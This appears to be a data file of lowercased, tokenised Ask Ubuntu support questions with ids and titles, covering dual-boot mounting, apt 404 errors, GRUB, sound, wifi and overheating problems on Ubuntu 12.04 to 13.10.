370628	how can i access hard drives from ubuntu 13.04 when i use dual boot with win8pro ?	i bought a new laptop of 64 bit toshiba 4th gen . i use dual boot system ( win8 pro and ubuntu 13.04 64 bit ) . when i use ubuntu then i found my hard drives ( d : , e : , f : ) showing a special sign like ? . i ca n't access those drives . when i click on them it tells me to mount . but i have n't a clear idea how to mount a hard drive . i already tried to mount by the help of internet but i failed to do so . how can i access those drives ? do i need to install any software/ application ? please give me a quick response .
370630	ca n't change screen resolution and login loop	problem in steps . 1 ) i cant change screen resolution ( my screen 1366x768 to 1024x768 ) 2 ) when i try to change resolution or create dual screen it kicks me to log in screen 3 ) after that i got login loop 4 ) to fix login loop i have to delete displays.xml file under ~/.config ... . i am using xubuntu 13.10 , first such problem i had with 13.04. my pc intel i5 2410 ( intel hd3000 ) nvidia 525m ( bumblebee ) if need some error logs or smth like that please tell me : ) because i dont know which and where to search : )
370631	how do i reproduce the f4 'repeat last action ' key windows users have	when using office , the f4 key will repeat any last action taken , such as deleting rows . highlighting selections , changing formats . this speeds up repetitive tasks . i ca n't find this function in ubuntu anywhere , anyone know a way to set this up , or where it might be hiding ?
370632	how to install or run ubuntu on windows 8 using wubi ?	okay , so i have a windows 8.1 pc , an asus x202e-db21t . it has 500 gb of hdd . i want to use ubuntu so that i can build a firefox os build , but windows is not supported . i do n't want to install ubuntu directly . wubi might help but it says win 8 is not compatible . how can i do this ? also , if i do install it , can i use my tablet as a usb stick ? i do n't want to buy a usb stick . i could erase all of the sdcard data and put the .iso file there and boot from there .
370636	can `add-apt` be used for github repos ?	can add-apt be used for github repos ? i know that this adds a ppa from launchpad : sudo add-apt-repository ppa : chris-lea/node.js i would like to use a github repository instead of launchpad . is this possible ? how ?
370641	`` failed to fetch '' 404 not found , why ?	hdaf @ neolaptop : ~ $ sudo apt-get update [ sudo ] password for hdaf : ign http*//extras.ubuntu.com saucy inrelease ign http*//ppa.launchpad.net saucy inrelease ign http*//archive.canonical.com saucy inrelease ign http*//archive.ubuntu.com saucy inrelease ign http*//extras.ubuntu.com saucy inrelease ign http*//ppa.launchpad.net saucy inrelease ign http*//archive.canonical.com saucy inrelease ign http*//archive.ubuntu.com saucy-updates inrelease ign http*//ppa.launchpad.net saucy inrelease get:1 http*//extras.ubuntu.com saucy release.gpg [ 72 b ] ign http*//archive.canonical.com saucy inrelease ign http*//archive.ubuntu.com saucy-backports inrelease ign http*//ppa.launchpad.net saucy release.gpg ign http*//extras.ubuntu.com saucy release.gpg get:2 http*//archive.canonical.com saucy release.gpg [ 933 b ] ign http*//archive.ubuntu.com saucy-security inrelease get:3 http*//ppa.launchpad.net saucy release.gpg [ 316 b ] hit http*//extras.ubuntu.com saucy release get:4 http*//archive.ubuntu.com saucy release.gpg [ 933 b ] get:5 http*//archive.canonical.com saucy release.gpg [ 933 b ] get:6 http*//ppa.launchpad.net saucy release.gpg [ 316 b ] ign http*//extras.ubuntu.com saucy release ign http*//ppa.launchpad.net saucy release get:7 http*//archive.ubuntu.com saucy-updates release.gpg [ 933 b ] ign http*//archive.canonical.com saucy release.gpg hit http*//extras.ubuntu.com saucy/main sources hit http*//ppa.launchpad.net saucy release get:8 http*//archive.ubuntu.com saucy-backports release.gpg [ 933 b ] hit http*//extras.ubuntu.com saucy/main amd64 packages get:9 http*//archive.canonical.com saucy release [ 5916 b ] hit http*//ppa.launchpad.net saucy release hit http*//extras.ubuntu.com saucy/main i386 packages get:10 http*//archive.ubuntu.com saucy-security release.gpg [ 933 b ] hit http*//archive.canonical.com saucy release hit http*//archive.ubuntu.com saucy release ign http*//archive.canonical.com saucy release get:11 http*//archive.ubuntu.com saucy-updates release [ 49,6 kb ] get:12 http*//archive.canonical.com saucy/partner sources [ 1290 b ] get:13 http*//archive.canonical.com saucy/partner amd64 packages [ 693 b ] get:14 http*//archive.canonical.com saucy/partner i386 packages [ 1883 b ] hit http*//archive.ubuntu.com saucy-backports release get:15 http*//archive.ubuntu.com saucy-security release [ 49,6 kb ] get:16 http*//archive.canonical.com saucy/partner sources [ 1290 b ] get:17 http*//ppa.launchpad.net saucy/main sources [ 727 b ] hit http*//archive.canonical.com saucy/partner amd64 packages hit http*//ppa.launchpad.net saucy/main amd64 packages hit http*//archive.ubuntu.com saucy/restricted amd64 packages hit http*//ppa.launchpad.net saucy/main i386 packages hit http*//archive.canonical.com saucy/partner i386 packages hit http*//archive.ubuntu.com saucy/main amd64 packages hit http*//archive.ubuntu.com saucy/universe amd64 packages get:18 http*//ppa.launchpad.net saucy/main sources [ 3336 b ] hit http*//archive.ubuntu.com saucy/multiverse amd64 packages hit http*//archive.ubuntu.com saucy/restricted i386 packages hit http*//ppa.launchpad.net saucy/main amd64 packages hit http*//archive.ubuntu.com saucy/main i386 packages hit http*//ppa.launchpad.net saucy/main i386 packages hit http*//archive.ubuntu.com saucy/universe i386 packages hit http*//archive.ubuntu.com saucy/multiverse i386 packages hit http*//archive.ubuntu.com saucy/main translation-en hit http*//archive.ubuntu.com saucy/multiverse translation-en hit http*//archive.ubuntu.com saucy/restricted translation-en hit http*//archive.ubuntu.com saucy/universe translation-en get:19 http*//archive.ubuntu.com saucy-updates/restricted amd64 packages [ 14 b ] get:20 http*//archive.ubuntu.com saucy-updates/main amd64 packages [ 49,4 kb ] get:21 http*//archive.ubuntu.com saucy-updates/universe amd64 packages [ 18,1 kb ] get:22 http*//archive.ubuntu.com saucy-updates/multiverse amd64 packages [ 14 b ] get:23 http*//archive.ubuntu.com saucy-updates/restricted i386 packages [ 14 b ] get:24 http*//archive.ubuntu.com saucy-updates/main i386 packages [ 49,1 kb ] get:25 http*//archive.ubuntu.com saucy-updates/universe i386 packages [ 18,1 kb ] get:26 http*//archive.ubuntu.com saucy-updates/multiverse i386 packages [ 14 b ] ign http*//extras.ubuntu.com saucy/main translation-en_us get:27 http*//archive.ubuntu.com saucy-updates/main translation-en [ 20,5 kb ] ign http*//extras.ubuntu.com saucy/main translation-en err http*//extras.ubuntu.com saucy/main sources 404 not found err http*//extras.ubuntu.com saucy/source sources 404 not found hit http*//archive.ubuntu.com saucy-updates/multiverse translation-en err http*//extras.ubuntu.com saucy/main amd64 packages 404 not found err http*//ppa.launchpad.net saucy/main amd64 packages 404 not found err http*//extras.ubuntu.com saucy/source amd64 packages 404 not found hit http*//archive.ubuntu.com saucy-updates/restricted translation-en err http*//ppa.launchpad.net saucy/source amd64 packages 404 not found err http*//extras.ubuntu.com saucy/main i386 packages 404 not found err http*//ppa.launchpad.net saucy/main i386 packages 404 not found err http*//extras.ubuntu.com saucy/source i386 packages 404 not found err http*//ppa.launchpad.net saucy/source i386 packages 404 not found get:28 http*//archive.ubuntu.com saucy-updates/universe translation-en [ 10,7 kb ] ign http*//extras.ubuntu.com saucy/main translation-en_us ign http*//ppa.launchpad.net saucy/main translation-en_us ign http*//extras.ubuntu.com saucy/main translation-en ign http*//ppa.launchpad.net saucy/main translation-en hit http*//archive.ubuntu.com saucy-backports/restricted amd64 packages ign http*//extras.ubuntu.com saucy/source translation-en_us ign http*//ppa.launchpad.net saucy/source translation-en_us hit http*//archive.ubuntu.com saucy-backports/universe amd64 packages ign http*//extras.ubuntu.com saucy/source translation-en hit http*//archive.ubuntu.com saucy-backports/multiverse amd64 packages ign http*//ppa.launchpad.net saucy/source translation-en hit http*//archive.ubuntu.com saucy-backports/main amd64 packages ign http*//ppa.launchpad.net saucy/main translation-en_us hit http*//archive.ubuntu.com saucy-backports/restricted i386 packages ign http*//ppa.launchpad.net saucy/main translation-en ign http*//ppa.launchpad.net saucy/main translation-en_us hit http*//archive.ubuntu.com saucy-backports/universe i386 packages ign http*//ppa.launchpad.net saucy/main translation-en hit http*//archive.ubuntu.com saucy-backports/multiverse i386 packages hit http*//archive.ubuntu.com saucy-backports/main i386 packages hit http*//archive.ubuntu.com saucy-backports/main translation-en hit http*//archive.ubuntu.com saucy-backports/multiverse translation-en hit http*//archive.ubuntu.com saucy-backports/restricted translation-en hit http*//archive.ubuntu.com saucy-backports/universe translation-en get:29 http*//archive.ubuntu.com saucy-security/restricted amd64 packages [ 14 b ] get:30 http*//archive.ubuntu.com saucy-security/main amd64 packages [ 23,6 kb ] ign http*//archive.canonical.com saucy/partner translation-en_us ign http*//archive.canonical.com saucy/partner translation-en get:31 http*//archive.ubuntu.com saucy-security/universe amd64 packages [ 4010 b ] ign http*//archive.canonical.com saucy/partner translation-en_us get:32 http*//archive.ubuntu.com saucy-security/multiverse amd64 packages [ 14 b ] ign http*//archive.canonical.com saucy/partner translation-en get:33 http*//archive.ubuntu.com saucy-security/restricted i386 packages [ 14 b ] err http*//archive.canonical.com saucy/saucy sources 404 not found get:34 http*//archive.ubuntu.com saucy-security/main i386 packages [ 23,6 kb ] err http*//archive.canonical.com saucy/partner sources 404 not found err http*//archive.canonical.com saucy/source sources 404 not found get:35 http*//archive.ubuntu.com saucy-security/universe i386 packages [ 4033 b ] err http*//archive.canonical.com saucy/partner amd64 packages 404 not found get:36 http*//archive.ubuntu.com saucy-security/multiverse i386 packages [ 14 b ] err http*//archive.canonical.com saucy/source amd64 packages 404 not found err http*//archive.canonical.com saucy/partner i386 packages 404 not found hit http*//archive.ubuntu.com saucy-security/main translation-en err http*//archive.canonical.com saucy/source i386 packages 404 not found ign http*//archive.canonical.com saucy/partner translation-en_us hit http*//archive.ubuntu.com saucy-security/multiverse translation-en ign http*//archive.canonical.com saucy/partner translation-en hit http*//archive.ubuntu.com saucy-security/restricted translation-en ign http*//archive.canonical.com saucy/source translation-en_us ign http*//archive.canonical.com saucy/source translation-en hit http*//archive.ubuntu.com saucy-security/universe translation-en ign http*//archive.ubuntu.com saucy/main translation-en_us ign http*//archive.ubuntu.com saucy/multiverse translation-en_us ign http*//archive.ubuntu.com saucy/restricted translation-en_us ign http*//archive.ubuntu.com saucy/universe translation-en_us ign http*//archive.ubuntu.com saucy-updates/main translation-en_us ign http*//archive.ubuntu.com saucy-updates/multiverse translation-en_us ign http*//archive.ubuntu.com saucy-updates/restricted translation-en_us ign http*//archive.ubuntu.com saucy-updates/universe translation-en_us ign http*//archive.ubuntu.com saucy-backports/main translation-en_us ign http*//archive.ubuntu.com saucy-backports/multiverse translation-en_us ign http*//archive.ubuntu.com saucy-backports/restricted translation-en_us ign http*//archive.ubuntu.com saucy-backports/universe translation-en_us ign http*//archive.ubuntu.com saucy-security/main translation-en_us ign http*//archive.ubuntu.com saucy-security/multiverse translation-en_us ign http*//archive.ubuntu.com saucy-security/restricted translation-en_us ign http*//archive.ubuntu.com saucy-security/universe translation-en_us fetched 342 kb in 20s ( 16,7 kb/s ) w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/main/source/sources 404 not found w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/source/source/sources 404 not found w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/source/binary-amd64/packages 404 not found w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http*//extras.ubuntu.com/ubuntu/dists/dists/saucy/source/binary-i386/packages 404 not found w : failed to fetch http*//ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http*//ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/dists/saucy/source/binary-amd64/packages 404 not found w : failed to fetch http*//ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http*//ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/dists/saucy/source/binary-i386/packages 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/saucy/source/sources 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/partner/source/sources 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/source/source/sources 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/partner/binary-amd64/packages 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/source/binary-amd64/packages 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/partner/binary-i386/packages 404 not found w : failed to fetch http*//archive.canonical.com/ubuntu/dists/dists/saucy/source/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
370642	typeerror : can not call method 'hasownproperty ' of null , while creating a qmlscene window	i am trying to make a simple ubuntu touch web application with qt creator . i have set up a new project according to the tutorial and committed the files to bazaar . i have set a url instead of the default index.htm in the qml file of the project . using build- > run loads a qml scene window with the desired webpage , but qt creator yields the following output : starting /usr/lib/i386-linux-gnu/qt5/bin/qmlscene -i /home/tomas/ubuntu-sdk/sl-planner -i /usr/bin -i /usr/lib/i386-linux-gnu/qt5/qml /home/tomas/ubuntu-sdk/sl-planner/sl-planner.qml unity : :action : :actionmanager : :actionmanager ( qobject* ) : could not determine application identifier . hud will not work properly . provide your application identifier in $ app_id environment variable . file : ///usr/lib/i386-linux-gnu/qt5/qml/ubuntu/components/mainview.qml:257 : typeerror : can not call method 'hasownproperty ' of null my sl-planner.qml looks like this : import qtquick 2.0 import ubuntu.components 0.1 import qtwebkit 3.0 /* ! \brief mainview with a flickable webview . */ mainview { // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer.tomoqv.sl-planner '' /* this property enables the application to change orientation when the device is rotated . the default is false . */ automaticorientation : true width : units.gu ( 100 ) height : units.gu ( 75 ) flickable { id : webviewflickable anchors.fill : parent webview { id : webview anchors.fill : parent url : `` http : //mobil.sl.se '' } } } what am i missing ?
370645	spread windows not working on minimized applications	when i 'm using `` super '' + `` w '' to spread all running windows i only see the applications that are not minimized and the others are just nothing as seen on picture below . i have 5 applications running and 3 of them are minimized and this is how it looks : how to fix this ? i do n't know if this is a bug or if this is normal , but i do n't like it this way update : just found out that it actually only happens when i use `` super '' + `` d '' to minimize all windows , and then when opening some of them up again it will happen
370646	how can i handle `` ntfs partition is in unsafe state '' ?	error mounting /dev/sda3 at /media/franklcohen/os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/franklcohen/os '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i get this error i have disabled fast start up in windows 8. what can i do i shut down my computer 4 times in windows and disabled fast start in windows 8. i 'm using ubuntu 13.10. please help thanks .
370652	dell inspiron 5520 fan always working	i was trying to find a solution for my problem , but without any success . namely , i decided to move to ubuntu system ( from windows 8 ) and i installed latest one for my laptop ( 12.04 lts ) . i installed graphic card , wireless update , everything . however i 'm afraid that my card is not installed property because in detail there is written 'graphic driver : unknown ' even if i installed it . my fan is always working and i do n't know how to stop it or prevent . on windows 8 everything works without problems , fan stops etc . what could be my problem ?
370656	partitoning to install ubuntu but already have 4 main partitions	i want to install ubuntu alongside of windows , but there 's a 4 primary partitions limit . so there 's : bios_rvy ( 10gb ) system ( 100mb ) ( windows ) ( c : ) windows ( d : ) data i 'm not sure what to do in this situation . this is my girlfriend 's laptop and she does n't want to remove msi 's pre-installed recovery partition , even though i 'm pretty sure she 's never used it . what is it exactly ? also , does grub render windows 's `` system '' partition redundant ?
370657	dual boot vaio shutting down because of overheating	i have a sony vaio vpceg laptop with a dual boot ubuntu/windows system . when i run ubuntu ( 12.10 , quantal quetzal ) , my laptop sometimes randomly shuts down . this never happens on windows . i 've determined that this is due to a critically high temperature . when i run sensors , i get : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +95.0°c ( crit = +98.0°c ) temp2 : +71.0°c ( crit = +90.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +95.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +94.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +96.0°c ( high = +86.0°c , crit = +100.0°c ) i 've tried two different solutions : http : //lesoluzioni.blogspot.com/2012/08/ubuntu-overheating-fix.html installing jupiter and running on power saver . neither seem to help at all . any solutions would be greatly appreciated ! ! !
370659	lubuntu 13.10 intel corporation centrino advanced-n 6235 ( rev-24 ) issue	i have assus pu500c laptop with intel corporation centrino advanced-n 6235 ( rev-24 ) network controller . my wifi wokrs fine when my laptop is charging . but when i disconnect the charge after some time my wifi stops working . only reconnecting to the wifi network can help for a while .
370660	is it possible to set allocation unit size with gparted when formating an external hard drive ?	i want to format and set a single partition in an external hard drive with gparted ( ubuntu 12.04 ) and would like to set the allocation unit size . i do n't see any options to do this with gparted . is there a way to set aus in ubuntu ?
370663	facilitate access to system tray under gksudo -u user	i would like to run owncloud client as a different user , with something like : gksudo -u owncloud owncloud however , it is specifying : owncloud requires a working system tray . please install a system tray application such as trayer . if you are running xfce follow these instructions : http : //docs.xfce.org/xfce/xfce4-panel/systray the question remains , how does one facilitate having the owncloud user account use the parent 's system tray ?
370664	is this a b43 driver problem ?	i have 13.04 on a dell inspiron 1564 with broadcom 4312 wifi card . the wl drivers cause kernel panic on linux-3.8 so i succesfully installed the b43 driver a couple of months ago . now i have changed isp and got a new router , and the connection drop when downloading software from internet to a 2008r2 using remmina client , and apt-get install on virtual machines in virtualbox . i have no idea why this suddenly became a problem.. my phone does not loose the connection , just ubuntu . output from /var/log/syslog after lost connection rfkill list ( after disconnecting ) : 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes i can use networkmanager to disable wireless and then enable wireless to connect again . rfkill ublock all/wifi/0 removes only soft blocked . lshw -c network *-network description : wireless interface physical id : 4 logical name : wlan0 serial : 78 : e4:00:78 : d2:05 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.8.0-32-generic firmware=478.104 ip=10.0.0.3 link=yes multicast=yes wireless=ieee lspci 04:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) after waking from suspend and when booting , it takes about 40 sec to get network connection . this has been a problem all along and a different question , but i mention it anyway.. cus it 's annoying ! please take a look and hopefully someone spot a problem ! thanks !
370665	totem can not play this type of media ( dvd ) because it does not have the appropriate plugins to be able to read from the disc	i 've tried to get new plug ins but it just does n't work.i would love to watch a movie on my lab top but it says that it need appropriate plug ins to be able to read this disk .
370666	changing the operating system with only ubuntu installed	i really wanted to dive into the world of open source operating systems , so i downloaded the latest version of ubuntu ( 13.10 ) , and installed it on a clean ( no operating system installed , absolutely nothing ) lenovo thinkpad machine . after a few days , i wanted to try out a different operating system ( elementary os ) . i downloaded the iso file , burned it to a usb , tested that the usb booted from a different computer ( i have 2 , one is the lenovo , the other a hp ) . i was able to get the bootscreen , and everything worked like a charm after i set the bios to boot from usb disk drive instead of hd . after this , i went back to lenovo , and tried to open up the boot menu , by pressing f12 , so that i could load from a temporary device . to my surprise , nothing but the hd was listed . there was no optical drive , no usb drive , absolutely nothing . so , i thought that these devices were probably disabled . so i went into my bios and checked to see what was the case . i saw that all my devices were enabled . usb and all the other devices such as network cable and the rest were all enabled . so , i thought this probably had something to do wit uefi and legacy boot options . so , i made sure that both were enabled . this did not solve the problem either . again , i got nothing but the option to boot from my hard disk . i thought the usb had to be at fault . i tried different ports , but to no avail . next , i tried with a live cd , which had ubuntu on it . this failed too . i simply could not boot from anything other than my hard disk . okay , so at this point , i was pretty desperate , so i installed boot-repair through : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install boot-repair what this did is lead me to grub . ideally , its just a screen that gives me the option to load from ubuntu or advanced settings . the advanced settings had nothing but ubuntu options in it . so , i kept on pressing esc and that led me to the the grub console , and thats where i am right now with my lenovo . i 've also tried updating the bios , but lenovo only has packages for red hat and windows . so , a dead end there too . right now , i need to know if there is any way that i can just delete everything from my lenovo ? i want to revert it back to its blank factory condition . how can i achieve this ? i have tried to elaborate my problem as best i could . if there is any important information that i 've missed out , please do not hesitate to leave a comment . i would have included some screen shots , but bios screen shots are a little hard to manage . however , i can provide a camera image of the boot screen if needed ( doing that as we speak ) . update these are the pictures of my boot screen :
370667	empty disk when trying to install dual-boot system	i recently purchased an ssd to speed up my computer experience . before , i had windows 7 and ubuntu in a dual-boot system . the plan was to install windows 8 on the ssd and then set aside ~30gb for the system files of ubuntu . i installed windows 8 just fine on the ssd , then i booted the ubuntu install cd to make my partitions like always - but gparted tells me the entire ssd is unallocated . now i am afraid i will lose my windows installation if i try to do anything to it . why does gparted think there is no partition on the ssd ? should n't it be 4 partitions , like the windows installer told me ? and is it possible to ignore this and install ubuntu on the hard disk ( where it , frankly , already is ) and somehow make it possible to install grub on the ssd to revert my dual-boot system without damaging the installed win8 ?
370671	no sound 12.04 ( dummy output )	its been weeks with no sound . i feel like ive tried everything but somethings just dont seem right . i am a new user and so far i love ubuntu but this sound issue is making me unsure . im not muted . ive tried multiple jacks , front and back . in alsamixer it says choose sound card and i have only thr 'hda intel ' option . in pulseaudio i only have 'dummy output ' . when i have youtube on i can see audio being detected in pavucontrol but nothing is coming out of the speakers . im getting desperate , some one please walk me thru this . http : //www.alsa-project.org/db/ ? f=c7377242d96ea884edebd807f4fe71f619b8d6af what more information should i provided ?
370672	gnome-screenshot error in ubuntu gnome 13.10	i recently installed ubuntu gnome 13.10 ( it came with gnome 3.8 , but i replaced by gnome 3.10 ) and after a few problems , the only one i could n't solve was the screenshot problem . when i press the prtsc key , nothing happens . no sound , no nothing . when i execute it via terminal by writing `` gnome-screenshot '' , it does work and saves in my pictures folder . i have already tried to re-install the program , but still did n't work . i also tried to create a shortcut with this command line , but still nothing happend . i tried to replace the prtsc key by another one , just for make sure the problem was n't in the key , and it still failed . can anyone help me ?
370673	`` the program 'g++ ' can be found in the following packages ''	i have g++ 4.6 , 4.7 and 4.8 installed , but not g++ itself . i am using ubuntu 12.04 . if i do : g++ -- version it says : the program 'g++ ' can be found in the following packages : * g++ * pentium-builder i have tried the following : sudo apt-get update then sudo apt-get -f install then sudo apt-get install g++ but still i get the same when checking g++ version . please help ? doing apt-cache policy g++ yields : g++ : installed : 4:4.6.3-1ubuntu5 candidate : 4:4.6.3-1ubuntu5 version table : *** 4:4.6.3-1ubuntu5 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status
370681	in virtualbox , i ca n't access the dvd drive to install a guest host	i have installed a fresh copy of ubuntu server 12.04 and virtualbox 4.3 . i have set up a vm called `` mediaserver '' and tried to start it . i then get the following error : can not open host device '/dev/sr0 ' for readonly access . check the permissions of that device ( '/bin/ls -l /dev/sr0 ' ) : most probably you need to be member of the device group . make sure that you logout/login after changing the group settings of the current user ( verr_access_denied ) i have looked all over the internet and have been unable to find a solution . using webmin , i tried changing the group settings so that my user name was in the vboxusers group , but that did not work either . i tried various other changes in group settings and none of them worked . also , i tried rebooting the server after the changes and that did n't work either . i have been following a guide on how to set up an ubuntu server from the website `` linuxhomeserverguide.com '' and when it came to the section where you could finally set up your first virtual machine , i am stumped . i would really appreciate it if someone could help me .
370687	how reliable is virtual machine gcc binaries	i have an app which i need to generate the following : ubuntu 32/64 bits and the same to windows . now i have 64bits ubuntu 13.04 and i have virtual box with 13.04 32bits on the same machine . how reliable is the file produced by virtuabox ? can it be uploaded for customers to use it ? i currently have no other machine ( its coming and so it will finally sort out , but meanwhile i need to get it sorted for now ) how reliable is virtual machine binaries especially when run on native machine ? i have posts like this to make me worry a bit ! http : //stackoverflow.com/questions/8916145/c-doubles-precision-virtual-machines-and-gcc
370688	user permissions messed up after updating to 13.10	ubuntu 13.10 is not working properly since i upgraded from 13.04 - seems to be a problem with my user permissions : the gui shut down and reboot buttons do not work ( no response when clicking on them ) - although i can shut down the machine through the terminal or by pressing the physical power button . i can not mount my external usb hd drive - it appears under 'my devices ' but when i click on it , i get 'unable to access `` samsung '' not authorized to perform operation '' . same as ( 2 ) for when i try to play a dvd - i am not authorized to access the cdrom . if i try to log into a guest session i get a lot of 'ubuntu has experienced an internal error ' messages . in 'user accounts ' i can not click the unlocked padlock in order to make changes - when hovering above it shows 'system policy prevents changes . contact your system administrator ' - even though my account shows i am the administrator . please help ! ! ! !
370692	how to change the framerate of a video without reencoding	i 'm trying to change the framerate of an mp4 video ( it 's a 120fps gopro video , i want to play it back at 30fps for a slow-motion effect ) . i 'm using avconv for this : avconv -i sourcemovie.mp4 -vf setpts=4.0*pts -r 30 destmovie.mp4 that technically works , but it reencodes the movie . in addition to being slow , it 's obviously a quality issue . technically there should be a way to just set the fps in the header of video , how can i change that ? ( any tool other than avconv would work too . )
370693	how to add the grub password protection to the os load process instead of when editing boot options	this is the current content of my grub.conf file . # grub.conf generated by anaconda # # note that you do not have to rerun grub after making changes to this file # notice : you have a /boot partition . this means that # all kernel and initrd paths are relative to /boot/ , eg . # root ( hd0,0 ) # kernel /vmlinuz-version ro root=/dev/sda3 # initrd /initrd- [ generic- ] version.img # boot=/dev/sda password -- md5 $ 1 $ xw8nq1 $ /blni3dsrtmtkagd.pbe0 default=0 timeout=10 splashimage= ( hd0,0 ) /grub/splash.xpm.gz hiddenmenu # title my os 1234 ( 2.6.32-358.el6.i686 ) title group 10 linux server root ( hd0,0 ) kernel /vmlinuz-2.6.32-358.el6.i686 ro root=uuid=f9d7b7b0-3035-4c44-b7e2-97f995e995fb rd_no_luks rd_no_lvm lang=en_us.utf-8 rd_no_md sysfont=latarcyrheb-sun16 crashkernel=auto keyboardtype=pc keytable=us rd_no_dm rhgb quiet initrd /initramfs-2.6.32-358.el6.i686.img the user is prompted for the password only when they try to edit the boot options for the grub entry . i need to change this so that users are prompted for the password before the os is loaded . thank you !
370694	real time audio manipulation program	what i 'd like to do is play back audio files ( currently mp3 , but i 'd convert them if i had to ) , and perform basic audio manipulation on them , equalization , panning etc , and to be able to manipulate the parameters as the media were playing . in some sense what i want is audacity to support manipulation of its filter plugins while the media are playing , but it does n't seem to support this . ardour does allow this , but i 'd like to know if there is something a litter lighter-weight and less complicated . so , which ubuntu packages provide this type of functionality .
370695	ubiquity ca n't detect my main hard disk with windows 8 installed	i 'm running ubuntu live to see if it functions well along side of win 8.1 . for some reason the main drive is invisible to ubuntu . that is , a 500 gb drive shows at the launcher but reflects 0 bytes , 0bytes . it wo n't open in ubuntu . any ideas ?
370696	on boot , i get the grub terminal , but i want the os selection	title says all . i 'm kind of new with linux , but not entirely inexperienced . i tried using the sudo update-grub command ( only error was avoiding the flexnet , which if i recall has to do with the windows boot loader ) , but i 'm still only getting the grub terminal . how do i get rid of the grub terminal and have it give me the os selection menu ?
370697	how to count number of files in a directory but not recursively	simple question i 'm sure . i 've seen an answer that show how to do it including subdirectories , but i want to know how many files ( not folders ) are in the current directory only . thanks .
370698	problem of the black screen before booting my ubuntu 12.10	i have this problem from long time when i start my laptop or shutdown , i have always this black screen i do n't know why ? someone can help my plz this is the screenshot of the black screen http : //www.google.com/url ? sa=i & rct=j & q= & esrc=s & source=images & cd= & cad=rja & docid=thobqb5j8e7ahm & tbnid=izzollwinzwqjm : & ved= & url=http % 3a % 2f % 2fwww.adslgate.com % 2fdsl % 2fshowthread.php % 3ft % 3d1105498 & ei=ynr2uvk2a6lc7aauxyhgdg & bvm=bv.55819444 , d.zgu & psig=afqjcnhcqeuoedsvxccv9zamsfad7ky0zq & ust=1383605728449987
370703	13.10 does not play any sound	i just recently installed 13.10 from a cd and got everything to boot up very nicely . except now there is no audio . whenever i go into sound settings it just says `` dummy output '' under devices and i can not find my headphones . the audio test in sound settings always proves to no avail and whenever i hit terminal with `` sudo aplay -l '' it always reads back `` aplay : device_list:268 : no soundcards found ... '' i 'm not very experienced with linux and any help would be ultra-appreciated . thank you all .
370706	ability to install ubuntu on asus pu500ca	i 'm going to buy and start using ubuntu on asus pu500ca with i5 processor ( http : //www.asus.com/commercial_notebook/asuspro_essential_pu500ca/ # specifications ) and wanted to ask you for advice - does n't it seems that it 'll work ok on this laptop , or some of its hardware seems to work not quite ok ? thanks a lot !
370707	ca n't connect to wireless network with linksys wusb11 v.2.6 adapter , networks visible	i just set up a dual boot on an old hp computer and have upgraded to 12.04 , but i am still having trouble getting connected wirelessly . note : i have read many other posts with similar problems but none of their solutions have done the trick yet . i have gotten as far as being able to view wireless networks by virtue of installing atmel firmware , but no luck connecting still . my router is wep encrypted and a wireless-g router from linksys , whereas my wireless usb adapter is wireless-b if that makes a difference . any help is greatly appreciated ! here are some outputs to help anyone get started with me : when trying to connect to my network : iwconfig lo no wireless extensions . wlan0 ieee 802.11b essid : '' biokids '' mode : managed frequency:2.437 ghz access point : 00:21:29:6b:35:38 bit rate=1 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=42/100 signal level=42/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . shortly thereafter : iwconfig lo no wireless extensions . wlan0 ieee 802.11b essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 058f:9360 alcor micro corp. 8-in-1 media card reader bus 003 device 006 : id 077b:2219 linksys wusb11 v2.6 802.11b adapter bus 